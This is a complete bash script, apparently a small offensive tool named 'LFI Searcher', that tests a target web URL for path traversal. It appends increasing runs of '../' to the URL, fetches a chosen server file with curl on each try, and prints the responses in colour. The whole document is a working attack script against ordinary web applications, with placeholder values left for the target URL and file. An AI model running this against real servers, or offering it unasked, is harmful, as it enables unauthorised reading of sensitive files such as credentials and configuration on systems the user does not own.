base_url="[URL_HERE}]"
target_file="{TARGET_FILE_PATH_HERE}"
max_attempts=10

# Define some color and style codes
bold=$(tput bold)
normal=$(tput sgr0)
red=$(tput setaf 1)
green=$(tput setaf 2)

# Print the initial script information
echo "====================================="
echo "LFI Searcher - By Jtgit4"
echo "Target URL: $base_url"
echo "Target File: $target_file"
echo "Attempts: $max_attempts"
echo "====================================="
echo "Searching:"
echo

for i in $(seq 1 $max_attempts); do
  relative_path=$(printf '../%.0s' $(seq 1 $i))
  url="${base_url}${relative_path}${target_file}"
  result=$(/usr/bin/curl -s "$url")  # Using -s to silent progress meter
  exit_status=$?

  # Determine result color
  if [[ "$result" =~ "No such file" ]] || [[ "$result" =~ "No Result" ]]; then
    result_color="$red"
  elif [ $exit_status -ne 0 ]; then
    result_color="$red"
    result="curl command failed with exit status $exit_status"
  else
    result_color="$green"
  fi

  # Print the attempt number and result
  echo -e "====================================="
  echo -e "Attempt:==> ${bold}${i}${normal} ${relative_path}${target_file}\n"
  echo -e "Result:\n\n${result_color}${result}${normal}\n"

  sleep 1 # Delay for 1 second
done